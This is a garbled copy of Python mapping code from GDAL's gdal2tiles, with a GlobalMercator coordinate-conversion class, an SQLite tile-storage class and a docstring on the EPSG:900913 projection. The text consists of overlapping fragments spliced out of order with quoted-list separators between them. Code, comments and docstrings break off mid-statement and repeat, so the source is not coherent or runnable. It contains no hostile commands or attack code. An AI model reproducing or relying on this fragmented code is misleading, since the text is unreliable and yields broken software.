How do I create a raster in EPSG:900913 and", "my = py * res - self.originShift return mx, my def MetersToPixels(self, mx,", "(?,?,?,?)', # (z, x, y, sqlite3.Binary(f.read()))) def createBigPlanetFromTMS(self, targetname, overwrite=False): \"\"\" Create a", "\"Converts pixel coordinates in given zoom level of pyramid to EPSG:900913\" mapSize =", "createOSMFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite with OSM/Bing/Googlemaps numbering scheme from", "on top of base maps of those web mapping applications. Pixel and tile", "Geodetic Datum. Well, the web clients like Google Maps are projecting those coordinates", "/ 180.0 my = math.log( math.tan((90 + lat) * math.pi / 360.0 ))", "MAXZOOMLEVEL = 32 class GlobalMercator(object): \"\"\" TMS Global Mercator Profile --------------------------- Functions necessary", "(my / self.originShift) * 180.0 lat = 180 / math.pi * (2 *", "math.pi * (2 * math.atan( math.exp( lat * math.pi / 180.0)) - math.pi", "miny, maxx, maxy ) def TileLatLonBounds(self, tx, ty, zoom ): \"Returns bounds of", "TileLatLonBounds(self, tx, ty, zoom ): \"Returns bounds of the given tile in latutude/longitude", "zz= 17 - z yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromOSM(self,", "z from tiles\") res = cur.fetchall() for (x, y, z) in res: xx=", "cur = self.db.cursor() cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS tiles ( x", ")) self.minzoom = None self.maxzoom = None self.written = set() self.db.commit() self.pending_images =", "mx, my def MetersToLatLon(self, mx, my ): \"Converts XY point from Spherical Mercator", "(z, x, y, sqlite3.Binary(f.read()))) def createBigPlanetFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite", "calculations, we use the spherical form of projection, not the ellipsoidal form. 
Since", "zoom level of pyramid to EPSG:900913\" mapSize = self.tileSize << zoom py =", ": \"\"\" Create a new sqlite file from a z/y/x.ext directory structure\"\"\" self.create(filename,", "def commitData(self, force = False): if len(self.pending_images) > 500 or force: cur =", "Mercator tiles:: LatLon <-> Meters <-> Pixels <-> Tile WGS84 coordinates Spherical Mercator", "target.writeImage(xx,yy,zz,im) def createOSMFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite with OSM/Bing/Googlemaps numbering", "is used only for map display, and not for displaying numeric coordinates, we", "| /--------/ QuadTree ----- --------- /------------/ KML, public WebMapService Web Clients TileMapService What", "cur.execute(\"UPDATE Info SET minzoom = (?), maxzoom = (?)\", (self.minzoom, self.maxzoom)) self.db.commit() def", "circumference of the Earth in meters, which is 40 thousand kilometers, the coordinate", "corner, id is XYZ. Google placed the origin [0,0] to the top-left corner,", "top-left corner of the extent return tx, (2**zoom - 1) - ty def", "res py = (my + self.originShift) / res mapSize = self.tileSize << zoom", "mapSize - pyr res = self.Resolution( zoom ) mx = px * res", "(ty+1)*self.tileSize, zoom ) maxx, maxy = self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize, zoom ) return (", "* res - self.originShift return mx, my def MetersToPixels(self, mx, my, zoom): \"Converts", "let me know. My email: klokan at klokan dot cz. 
I would like", "simplify the calculations, we use the spherical form of projection, not the ellipsoidal", "lower zoom level resolution is always divided by two initialResolution = 20037508.342789244 *", "Info SET minzoom = (?), maxzoom = (?)\", (self.minzoom, self.maxzoom)) self.db.commit() def writeImageFile(self,", "y, z) in res: xx= x zz= z yy= 2**zz - y im=self.readImage(x,y,z)", "<< (i-1) if (tx & mask) != 0: digit += 1 if (ty", "res: image = str(res[0]) return image else : print (\"None found\") return None", "\"Returns tile for given mercator coordinates\" px, py = self.MetersToPixels( mx, my, zoom)", "i in range(zoom, 0, -1): digit = 0 mask = 1 << (i-1)", "defined in Tile Map Service (TMS) Profiles ============================================================== Functions necessary for generation of", "coordinates are using WGS84 datum, yeh? Yes, all lat/lon we are mentioning should", "same projection is degined as EPSG:3785. WKT definition is in the official EPSG", "zz= z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createOSMFromTMS(self, targetname, overwrite=False): \"\"\"", "<NAME> on 2008-07-03. Google Summer of Code 2008, project GDAL2Tiles for OSGEO. In", "else : print (\"None found\") return None def createFromDirectory(self, filename, basedir, overwrite=False) :", "product, translate it to another language or find it usefull for your project", "tile coordinates to Google Tile coordinates\" # coordinate origin is moved from bottom-left", "the WGS84 ellipsoid. 
From MSDN documentation: To simplify the calculations, we use the", "rouault $\" class SqliteTileStorage(): \"\"\" Sqlite files methods for simple tile storage\"\"\" def", "(math.pi / 180.0) my = my * self.originShift / 180.0 return mx, my", "# # mapSize = self.tileSize << zoom # return px, mapSize - py", "Equator)\" # return (2 * math.pi * 6378137) / (self.tileSize * 2**zoom) return", "xx= x zz= 17 - z yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im)", "given zoom level\" res = self.Resolution( zoom ) px = (mx + self.originShift)", "clipped off. What are zoom level constants (pixels/meter) for pyramid with EPSG:900913? whole", "20037508.342789244, 20037508.342789244] Constant 20037508.342789244 comes from the circumference of the Earth in meters,", "- y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createOSMFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite", "Google Maps Global Mercator), EPSG:3785, OSGEO:41001. Such tiles are compatible with Google Maps,", "gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $\" class SqliteTileStorage(): \"\"\" Sqlite files methods for", "coordinates\" tx = int( math.ceil( px / float(self.tileSize) ) - 1 ) ty", "z yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromOSM(self, targetname, overwrite=False): \"\"\"", "print (\"None found\") return None def createFromDirectory(self, filename, basedir, overwrite=False) : \"\"\" Create", "lat/lon XY in metres XY pixels Z zoom XYZ from TMS EPSG:4326 EPSG:900913", "CREATEINDEX: cur.execute( \"\"\" CREATE INDEX IND ON tiles(x,y,z,s) \"\"\") cur.execute(\"insert into info(desc, tilenumbering)", "+lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +no_defs Human readable WKT format of", "Functions necessary for generation of tiles in Spherical Mercator projection, EPSG:900913 (EPSG:gOOglE, Google", "QuadTree name, defined on the website: 
http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates are using WGS84", "convention? The tile raster itself is the same (equal extent, projection, pixel size),", "of the pyramid closest to the pixelSize.\" for i in range(MAXZOOMLEVEL): if pixelSize", "WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid lat/lon XY in", "are using WGS84 datum, yeh? Yes, all lat/lon we are mentioning should use", "the middle of extent. In fact you can calculate the constant as: 2", "blob, PRIMARY KEY(x,y,z,s)) \"\"\") cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS info (", "you use this class in your product, translate it to another language or", "[0,0] in bottom-left). What coordinate conversions do we need for TMS Global Mercator", "+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +no_defs Human readable", "in EPSG:900913 and convert coordinates with PROJ.4? You can use standard GIS tools", "where it was used. Class is available under the open-source GDAL license (www.gdal.org).", "target.writeImage(xx,yy,zz,im) # ============================================================================= # ============================================================================= # ============================================================================= __doc__globalmaptiles = \"\"\" globalmaptiles.py Global Map", "is 40 thousand kilometers, the coordinate origin is in the middle of extent.", "bigger then 85.05112878 are clipped off. 
What are zoom level constants (pixels/meter) for", "return ( minLat, minLon, maxLat, maxLon ) def TileLatLonCorners(self, tx, ty, zoom ):", "self.maxzoom = z self.commitData() def commitData(self, force = False): if len(self.pending_images) > 500", "self.TileBounds( tx, ty, zoom) minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1]) maxLat, maxLon = self.MetersToLatLon(bounds[2],", "you can calculate the constant as: 2 * math.pi * 6378137 / 2.0", "p1_lon, p2_lat, p2_lon, p3_lat, p3_lon, p4_lat, p4_lon) def Resolution(self, zoom ): \"Resolution (meters/pixel)", "For other GIS programs check the exact definition of the projection: More info", "(meters/pixel) for given zoom level (measured at Equator)\" # return (2 * math.pi", "GIS programs check the exact definition of the projection: More info at http://spatialreference.org/ref/user/google-projection/", "zoom ) mx = px * res - self.originShift my = py *", "self.originShift) * 180.0 lat = 180 / math.pi * (2 * math.atan( math.exp(", "py def MetersToTile(self, mx, my, zoom): \"Returns tile for given mercator coordinates\" px,", "return ( minx, miny, maxx, maxy ) def TileLatLonBounds(self, tx, ty, zoom ):", "6378137) / (self.tileSize * 2**zoom) return self.initialResolution / (2**zoom) def ZoomForPixelSize(self, pixelSize ):", "Tile Map Service (TMS) Profiles ============================================================== Functions necessary for generation of global tiles", "\"\"\" Create a new sqlite file from a z/y/x.ext directory structure\"\"\" self.create(filename, overwrite)", "zz= z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) # ============================================================================= # ============================================================================= #", "if os.path.isfile(self.filename): CREATEINDEX=False self.db = sqlite3.connect(self.filename) cur = self.db.cursor() cur.execute( \"\"\" CREATE TABLE", "y, z, f) #cur.execute('insert into tiles (z, x, 
y,image) \\ # values (?,?,?,?)',", "/ 180.0) my = my * self.originShift / 180.0 return mx, my def", "# values (?,?,?,?)', # (z, x, y, sqlite3.Binary(f.read()))) def createBigPlanetFromTMS(self, targetname, overwrite=False): \"\"\"", "Create a new sqlite with TMS numbering scheme from a BigPlanet one\"\"\" target=SqliteTileStorage('TMS')", "+ lat) * math.pi / 360.0 )) / (math.pi / 180.0) my =", "in TMS notation (origin [0,0] in bottom-left). What coordinate conversions do we need", "You can use standard GIS tools like gdalwarp, cs2cs or gdaltransform. All of", "= 1 << (i-1) if (tx & mask) != 0: digit += 1", "| | <-> /----/ <-> Google \\ / | | /--------/ QuadTree -----", "self.pending_images.append((z, x, y, 0, sqlite3.Binary(image))) if self.minzoom is None or z < self.minzoom:", "#def PixelsToRaster(self, px, py, zoom): # \"Move the origin of pixel coordinates to", "do we need for TMS Global Mercator tiles:: LatLon <-> Meters <-> Pixels", "180 / math.pi * (2 * math.atan( math.exp( lat * math.pi / 180.0))", "from TMS EPSG:4326 EPSG:900913 .----. --------- -- TMS / \\ <-> | |", "px, pyr, zoom): \"Converts pixel coordinates in given zoom level of pyramid to", "coordinates, we don't need the extra precision of an ellipsoidal projection. The spherical", "create a raster in EPSG:900913 and convert coordinates with PROJ.4? 
You can use", "\"Returns a tile covering region in given pixel coordinates\" tx = int( math.ceil(", "z) in self.written: return self.written.add((x, y, z)) self.pending_images.append((z, x, y, 0, sqlite3.Binary(image))) if", "im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromBigPlanet(self, targetname, overwrite=False): \"\"\" Create a new sqlite with TMS", "ty-1, zoom) return (p1_lat, p1_lon, p2_lat, p2_lon, p3_lat, p3_lon, p4_lat, p4_lon) def Resolution(self,", "mask import sqlite3 import os import math __version__ = \"$Id: gdal2tiles.py 19288 2010-04-02", "are compatible with Google Maps, Microsoft Virtual Earth, Yahoo Maps, UK Ordnance Survey", "exact definition of the projection: More info at http://spatialreference.org/ref/user/google-projection/ The same projection is", "- pyr res = self.Resolution( zoom ) mx = px * res -", "2.0) return lat, lon def PixelsToMeters(self, px, pyr, zoom): \"Converts pixel coordinates in", "tools supports -t_srs 'epsg:900913'. For other GIS programs check the exact definition of", "as if the were on the WGS84 ellipsoid. From MSDN documentation: To simplify", "# \"Move the origin of pixel coordinates to top-left corner\" # # mapSize", "tx, (2**zoom - 1) - ty def QuadTree(self, tx, ty, zoom ): \"Converts", "pyramid to EPSG:900913\" mapSize = self.tileSize << zoom py = mapSize - pyr", "Datum to XY in Spherical Mercator EPSG:900913\" mx = lon * self.originShift /", "pixelSize > self.Resolution(i): if i!=0: return i-1 else: return 0 # We don't", "float(self.tileSize) ) - 1 ) ty = int( math.ceil( py / float(self.tileSize) )", "a QuadTree name, defined on the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates are using", "(z, x, y,image) \\ # values (?,?,?,?)', # (z, x, y, sqlite3.Binary(f.read()))) def", "PixelsToTile(self, px, py): \"Returns a tile covering region in given pixel coordinates\" tx", "constants (pixels/meter) for pyramid with EPSG:900913? 
whole region is on top of pyramid", "xx) z=zz x=xx y=yy print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x, y, z, f) #cur.execute('insert into", "AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0], UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\" def __init__(self, tileSize=256): \"Initialize", "(based on EPSG:900913 = EPSG:3785) for Google Maps, Yahoo Maps, Microsoft Maps compatible", "\"$Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $\" class SqliteTileStorage(): \"\"\" Sqlite files methods", "math.atan( math.exp( lat * math.pi / 180.0)) - math.pi / 2.0) return lat,", "are mentioning should use WGS84 Geodetic Datum. Well, the web clients like Google", "= 0 mask = 1 << (i-1) if (tx & mask) != 0:", "your project please let me know. My email: klokan at klokan dot cz.", "Earth in meters, which is 40 thousand kilometers, the coordinate origin is in", "Tiles in TMS are counted from [0,0] in the bottom-left corner, id is", "return px, mapSize - py def MetersToTile(self, mx, my, zoom): \"Returns tile for", "API, ... 
and you can overlay them on top of base maps of", "files methods for simple tile storage\"\"\" def __init__(self, type): self.type=type def create(self, filename,", "y=yy print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x, y, z, f) #cur.execute('insert into tiles (z, x,", "2.0 $ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:900913 Polar areas", "180.0) my = my * self.originShift / 180.0 return mx, my def MetersToLatLon(self,", "programs check the exact definition of the projection: More info at http://spatialreference.org/ref/user/google-projection/ The", "p1_lat, p1_lon, p3_lat, p3_lon = self.TileLatLonBounds(tx, ty, zoom) p2_lat, p2_lon, _ , _", "Spherical Mercator EPSG:900913 to lat/lon in WGS84 Datum\" lon = (mx / self.originShift)", "targetname, overwrite=False): \"\"\" Create a new sqlite with BigPlanet numbering scheme from a", "defined on the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates are using WGS84 datum, yeh?", "TMS numbering scheme from a OSM/Bing/Googlemaps one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor()", "self.Resolution(i): if i!=0: return i-1 else: return 0 # We don't want to", "it usefull for your project please let me know. My email: klokan at", "lat/lon coordinates are using WGS84 datum, yeh? 
Yes, all lat/lon we are mentioning", "self.originShift return mx, my def MetersToPixels(self, mx, my, zoom): \"Converts EPSG:900913 to pyramid", "Mercator Pixels in pyramid Tiles in pyramid lat/lon XY in metres XY pixels", "maxx, maxy = self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize, zoom ) return ( minx, miny, maxx,", "os.unlink(self.filename) else: if os.path.isfile(self.filename): CREATEINDEX=False self.db = sqlite3.connect(self.filename) cur = self.db.cursor() cur.execute( \"\"\"", "the Earth in meters, which is 40 thousand kilometers, the coordinate origin is", "Maps are projecting those coordinates by Spherical Mercator, so in fact lat/lon coordinates", "pixel coordinates in given zoom level\" res = self.Resolution( zoom ) px =", "\"\"\" read a single tile as string \"\"\" cur = self.db.cursor() cur.execute(\"select image", "============================================================== Functions necessary for generation of global tiles used on the web. It", "yeh? Yes, all lat/lon we are mentioning should use WGS84 Geodetic Datum. Well,", "$\" class SqliteTileStorage(): \"\"\" Sqlite files methods for simple tile storage\"\"\" def __init__(self,", "def MetersToTile(self, mx, my, zoom): \"Returns tile for given mercator coordinates\" px, py", "info ( desc TEXT, tilenumbering TEXT, minzoom int, maxzoom int) \"\"\") if CREATEINDEX:", "necessary for generation of global tiles used on the web. 
It contains classes", "pixelSize ): \"Maximal scaledown zoom of the pyramid closest to the pixelSize.\" for", "self.TileLatLonBounds(tx, ty-1, zoom) return (p1_lat, p1_lon, p2_lat, p2_lon, p3_lat, p3_lon, p4_lat, p4_lon) def", "if self.minzoom is None or z < self.minzoom: self.minzoom = z if self.maxzoom", "os.path.isfile(self.filename): self.db = sqlite3.connect(self.filename) return True else: return False def close(self): self.commitData(force=True) cur", "20037508.342789244 def LatLonToMeters(self, lat, lon ): \"Converts given lat/lon in WGS84 Datum to", "Profile --------------------------- Functions necessary for generation of tiles in Spherical Mercator projection, EPSG:900913", "in given pixel coordinates\" tx = int( math.ceil( px / float(self.tileSize) ) -", ": \"\"\" write a single tile from a file \"\"\" self.writeImage(x, y, z,", "--------------------------- Functions necessary for generation of tiles in Spherical Mercator projection, EPSG:900913 (EPSG:gOOglE,", "MetersToLatLon(self, mx, my ): \"Converts XY point from Spherical Mercator EPSG:900913 to lat/lon", "+nadgrids=@null +no_defs Human readable WKT format of EPGS:900913: PROJCS[\"Google Maps Global Mercator\", GEOGCS[\"WGS", "or not if already exists\"\"\" self.filename=filename CREATEINDEX=True if overwrite: if os.path.isfile(self.filename): os.unlink(self.filename) else:", "= (mx / self.originShift) * 180.0 lat = (my / self.originShift) * 180.0", "PROJ.4? You can use standard GIS tools like gdalwarp, cs2cs or gdaltransform. 
All", "lon * self.originShift / 180.0 my = math.log( math.tan((90 + lat) * math.pi", "xx= x zz= z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) # ============================================================================= #", "given tile in EPSG:900913 coordinates\" minx, miny = self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize, zoom )", "Spherical Mercator, so in fact lat/lon coordinates on sphere are treated as if", "-1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromOSM(self, targetname, overwrite=False): \"\"\" Create a new sqlite with", "input: vrt file (-addalpha) in 3857 projection (projection is forced due # to", "res = cur.fetchone() if res: image = str(res[0]) return image else : print", "Constant 20037508.342789244 comes from the circumference of the Earth in meters, which is", "z, f.read()) def writeImage(self, x, y, z, image) : \"\"\" write a single", "TMS / \\ <-> | | <-> /----/ <-> Google \\ / |", "metres XY pixels Z zoom XYZ from TMS EPSG:4326 EPSG:900913 .----. --------- --", "40 thousand kilometers, the coordinate origin is in the middle of extent. In", "y, z, image) : \"\"\" write a single tile from string \"\"\" if", "\\ # values (?,?,?,?)', # (z, x, y, sqlite3.Binary(f.read()))) def createBigPlanetFromTMS(self, targetname, overwrite=False):", "bounds = self.TileBounds( tx, ty, zoom) minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1]) maxLat, maxLon", "given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:900913\" mx =", "are counted from [0,0] in the bottom-left corner, id is XYZ. Google placed", "know where it was used. 
Class is available under the open-source GDAL license", "MetersToPixels(self, mx, my, zoom): \"Converts EPSG:900913 to pyramid pixel coordinates in given zoom", "/ (2**zoom) def ZoomForPixelSize(self, pixelSize ): \"Maximal scaledown zoom of the pyramid closest", "y, z from tiles\") res = cur.fetchall() for (x, y, z) in res:", "between TMS and Google Maps/QuadTree tile name convention? The tile raster itself is", "CREATE INDEX IND ON tiles(x,y,z,s) \"\"\") cur.execute(\"insert into info(desc, tilenumbering) values('Simple sqlite tile", "z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createOSMFromTMS(self, targetname, overwrite=False): \"\"\" Create", "ty = (2**zoom - 1) - ty for i in range(zoom, 0, -1):", "- 1) - ty for i in range(zoom, 0, -1): digit = 0", "self.originShift) * 180.0 lat = (my / self.originShift) * 180.0 lat = 180", "sqlite3 import os import math __version__ = \"$Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault", "= cur.fetchall() for (x, y, z) in res: xx= x zz= 17 -", "id is XYZ. 
Google placed the origin [0,0] to the top-left corner, reference", "XY in metres XY pixels Z zoom XYZ from TMS EPSG:4326 EPSG:900913 .----.", "TileBounds(self, tx, ty, zoom): \"Returns bounds of the given tile in EPSG:900913 coordinates\"", "\"\"\" self.writeImage(x, y, z, f.read()) def writeImage(self, x, y, z, image) : \"\"\"", "/ 256 = 156543.03392804062 What is the difference between TMS and Google Maps/QuadTree", "os.path.isfile(self.filename): CREATEINDEX=False self.db = sqlite3.connect(self.filename) cur = self.db.cursor() cur.execute( \"\"\" CREATE TABLE IF", "( minLat, minLon, maxLat, maxLon ) def TileLatLonCorners(self, tx, ty, zoom ): p1_lat,", "python #****************************************************************************** # From $Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $ # VERSION", "__init__(self, type): self.type=type def create(self, filename, overwrite=False): \"\"\" Create a new storage file,", "tilenumbering TEXT, minzoom int, maxzoom int) \"\"\") if CREATEINDEX: cur.execute( \"\"\" CREATE INDEX", "[-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244] Constant 20037508.342789244 comes from the circumference of the Earth", "- y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) # ============================================================================= # ============================================================================= # ============================================================================= __doc__globalmaptiles = \"\"\"", "meters, which is 40 thousand kilometers, the coordinate origin is in the middle", "mentioning should use WGS84 Geodetic Datum. 
Well, the web clients like Google Maps", "(zoom=0) covered by 256x256 pixels tile, every lower zoom level resolution is always", "Mercator EPSG:900913 to lat/lon in WGS84 Datum\" lon = (mx / self.originShift) *", "on EPSG:4326) for OpenLayers Base Map and Google Earth compatible tiles More info", "the tools supports -t_srs 'epsg:900913'. For other GIS programs check the exact definition", "============================================================================= # ============================================================================= __doc__globalmaptiles = \"\"\" globalmaptiles.py Global Map Tiles as defined in", "'epsg:900913'. For other GIS programs check the exact definition of the projection: More", "calculate the constant as: 2 * math.pi * 6378137 / 2.0 $ echo", "tile, every lower zoom level resolution is always divided by two initialResolution =", "\"\"\" Create a new sqlite with BigPlanet numbering scheme from a TMS one\"\"\"", "zoom): \"Converts EPSG:900913 to pyramid pixel coordinates in given zoom level\" res =", "= (?)\", (self.minzoom, self.maxzoom)) self.db.commit() def writeImageFile(self, x, y, z, f) : \"\"\"", "\"Converts EPSG:900913 to pyramid pixel coordinates in given zoom level\" res = self.Resolution(", "for pyramid with EPSG:900913? whole region is on top of pyramid (zoom=0) covered", "PROJCS[\"Google Maps Global Mercator\", GEOGCS[\"WGS 84\", DATUM[\"WGS_1984\", SPHEROID[\"WGS 84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433],", "tools like gdalwarp, cs2cs or gdaltransform. All of the tools supports -t_srs 'epsg:900913'.", "with abs(latitude) bigger then 85.05112878 are clipped off. 
What are zoom level constants", "EPSG:900913 coordinates\" minx, miny = self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize, zoom ) maxx, maxy =", "zoom return px, mapSize - py def PixelsToTile(self, px, py): \"Returns a tile", "str(res[0]) return image else : print (\"None found\") return None def createFromDirectory(self, filename,", "res mapSize = self.tileSize << zoom return px, mapSize - py def PixelsToTile(self,", "My email: klokan at klokan dot cz. I would like to know where", "zoom ): \"Resolution (meters/pixel) for given zoom level (measured at Equator)\" # return", "(?))\", (self.type, )) self.minzoom = None self.maxzoom = None self.written = set() self.db.commit()", "py, zoom): # \"Move the origin of pixel coordinates to top-left corner\" #", "one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from tiles\")", "= \"\" ty = (2**zoom - 1) - ty for i in range(zoom,", "x, y, z) : \"\"\" read a single tile as string \"\"\" cur", "spherical projection causes approximately 0.33 percent scale distortion in the Y direction, which", "def readImage(self, x, y, z) : \"\"\" read a single tile as string", ") def TileLatLonBounds(self, tx, ty, zoom ): \"Returns bounds of the given tile", "EPSG:4326) for OpenLayers Base Map and Google Earth compatible tiles More info at:", "return lat, lon def PixelsToMeters(self, px, pyr, zoom): \"Converts pixel coordinates in given", "py * res - self.originShift return mx, my def MetersToPixels(self, mx, my, zoom):", "cur = self.db.cursor() cur.execute(\"UPDATE Info SET minzoom = (?), maxzoom = (?)\", (self.minzoom,", "coordinates\" px, py = self.MetersToPixels( mx, my, zoom) return self.PixelsToTile( px, py) def", "use standard GIS tools like gdalwarp, cs2cs or gdaltransform. All of the tools", "+k=1.0 +units=m +nadgrids=@null +no_defs Human readable WKT format of EPGS:900913: PROJCS[\"Google Maps Global", "as EPSG:3785. 
WKT definition is in the official EPSG database. Proj4 Text: +proj=merc", "z, f) : \"\"\" write a single tile from a file \"\"\" self.writeImage(x,", "raster in EPSG:900913 and convert coordinates with PROJ.4? You can use standard GIS", "Tile WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid lat/lon XY", "zz= 17 - z yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromBigPlanet(self,", "tile storage\"\"\" def __init__(self, type): self.type=type def create(self, filename, overwrite=False): \"\"\" Create a", "x, y, z, image) : \"\"\" write a single tile from string \"\"\"", "\\ / | | /--------/ QuadTree ----- --------- /------------/ KML, public WebMapService Web", "force = False): if len(self.pending_images) > 500 or force: cur = self.db.cursor() cur.executemany('insert", "self.db.cursor() cur.execute(\"select x, y, z from tiles\") res = cur.fetchall() for (x, y,", "zoom) return (p1_lat, p1_lon, p2_lat, p2_lon, p3_lat, p3_lon, p4_lat, p4_lon) def Resolution(self, zoom", "need the extra precision of an ellipsoidal projection. The spherical projection causes approximately", "maxx, maxy ) def TileLatLonBounds(self, tx, ty, zoom ): \"Returns bounds of the", "of tiles in Spherical Mercator projection, EPSG:900913 (EPSG:gOOglE, Google Maps Global Mercator), EPSG:3785,", "mx = px * res - self.originShift my = py * res -", "= my * self.originShift / 180.0 return mx, my def MetersToLatLon(self, mx, my", "is XYZ. 
Google placed the origin [0,0] to the top-left corner, reference is", "writeImage(self, x, y, z, image) : \"\"\" write a single tile from string", "documentation: To simplify the calculations, we use the spherical form of projection, not", "_ = self.TileLatLonBounds(tx, ty-1, zoom) return (p1_lat, p1_lon, p2_lat, p2_lon, p3_lat, p3_lon, p4_lat,", "scaledown zoom of the pyramid closest to the pixelSize.\" for i in range(MAXZOOMLEVEL):", "z > self.maxzoom: self.maxzoom = z self.commitData() def commitData(self, force = False): if", "read a single tile as string \"\"\" cur = self.db.cursor() cur.execute(\"select image from", ") - 1 ) return tx, ty #def PixelsToRaster(self, px, py, zoom): #", "import os import math __version__ = \"$Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $\"", "level constants (pixels/meter) for pyramid with EPSG:900913? whole region is on top of", "XYZ. Google placed the origin [0,0] to the top-left corner, reference is XYZ.", "XY in Spherical Mercator EPSG:900913\" mx = lon * self.originShift / 180.0 my", "| | /--------/ QuadTree ----- --------- /------------/ KML, public WebMapService Web Clients TileMapService", "* math.pi / 360.0 )) / (math.pi / 180.0) my = my *", "http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by <NAME> on 2008-07-03. 
Google Summer of Code", "int( math.ceil( py / float(self.tileSize) ) - 1 ) return tx, ty #def", "bounds[3]) return ( minLat, minLon, maxLat, maxLon ) def TileLatLonCorners(self, tx, ty, zoom", "self.written = set() self.db.commit() self.pending_images = [] def open(self, filename) : \"\"\" Open", "file from a z/y/x.ext directory structure\"\"\" self.create(filename, overwrite) for zs in os.listdir(basedir): zz=int(zs)", "\"Converts TMS tile coordinates to Microsoft QuadTree\" quadKey = \"\" ty = (2**zoom", "WGS84 Datum\" lon = (mx / self.originShift) * 180.0 lat = (my /", "project please let me know. My email: klokan at klokan dot cz. I", "py): \"Returns a tile covering region in given pixel coordinates\" tx = int(", "classes implementing coordinate conversions for: - GlobalMercator (based on EPSG:900913 = EPSG:3785) for", "return (2 * math.pi * 6378137) / (self.tileSize * 2**zoom) return self.initialResolution /", "self.originShift) / res mapSize = self.tileSize << zoom return px, mapSize - py", "pixel size), there is just different identification of the same raster tile. Tiles", "new sqlite with OSM/Bing/Googlemaps numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('OSM') target.create(targetname, overwrite)", "OSGEO:41001. Such tiles are compatible with Google Maps, Microsoft Virtual Earth, Yahoo Maps,", "mapSize = self.tileSize << zoom # return px, mapSize - py def MetersToTile(self,", "GlobalMercator (based on EPSG:900913 = EPSG:3785) for Google Maps, Yahoo Maps, Microsoft Maps", "os.listdir(basedir+'/'+zs+'/'): xx=int(xs) for ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0]) print (zz, yy, xx) z=zz x=xx", "where x=? and y=? 
